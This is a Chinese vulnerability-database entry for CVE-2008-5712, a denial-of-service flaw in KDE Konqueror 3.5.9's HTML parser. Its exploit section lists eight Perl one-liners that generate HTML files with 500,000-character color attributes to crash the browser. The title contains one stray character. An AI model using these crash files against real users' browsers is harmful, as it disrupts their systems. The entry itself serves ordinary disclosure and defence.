KDE Konquer或HTML Color Attribute 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184224 漏洞类型 输入验证
发布时间 2008-12-24 更新时间 2009-02-18
CVE编号 CVE-2008-5712 CNNVD-ID CNNVD-200812-434
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2008120192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-434
|漏洞详情
Konqueror是K桌面环境的文件管理器,也可用于浏览WEB。KDEKonqueror3.5.9版本的HTML剖析器允许远程攻击者可以借助(1)在一个HR元件中一个长的COLOR属性;或在一个(2)TABLE,(3)TD,或者(4)TR元件中的一个长的(a)BGCOLOR或(b)BORDERCOLOR属性,引起拒绝服务(应用程序崩溃)。注意:FONT向量已经被CVE-2008-4514覆盖。
|漏洞EXP
KDE's Konqueror & Color Attribute Love

perl -e 'print "<html>\n" . "<font color=" . "A" x 500000 . ">\n</html>"' > kdie.html
perl -e 'print "<html>\n" . "<hr color=" . "A" x 500000 . ">\n</html>"' > kdie2.html
perl -e 'print "<html>\n" . "<table bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie3.html
perl -e 'print "<html>\n" . "<table bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie4.html
perl -e 'print "<html>\n" . "<td bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie5.html
perl -e 'print "<html>\n" . "<td bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie6.html
perl -e 'print "<html>\n" . "<tr bgcolor=" . "A" x 500000 . ">\n</html>"' > kdie7.html
perl -e 'print "<html>\n" . "<tr bordercolor=" . "A" x 500000 . ">\n</html>"' > kdie8.html

|参考资料

来源:XF
名称:konqueror-htmlparser-dos(47696)
链接:http://xforce.iss.net/xforce/xfdb/47696
来源:MILW0RM
名称:6704
链接:http://www.milw0rm.com/exploits/6704
来源:SREASON
名称:4806
链接:http://securityreason.com/securityalert/4806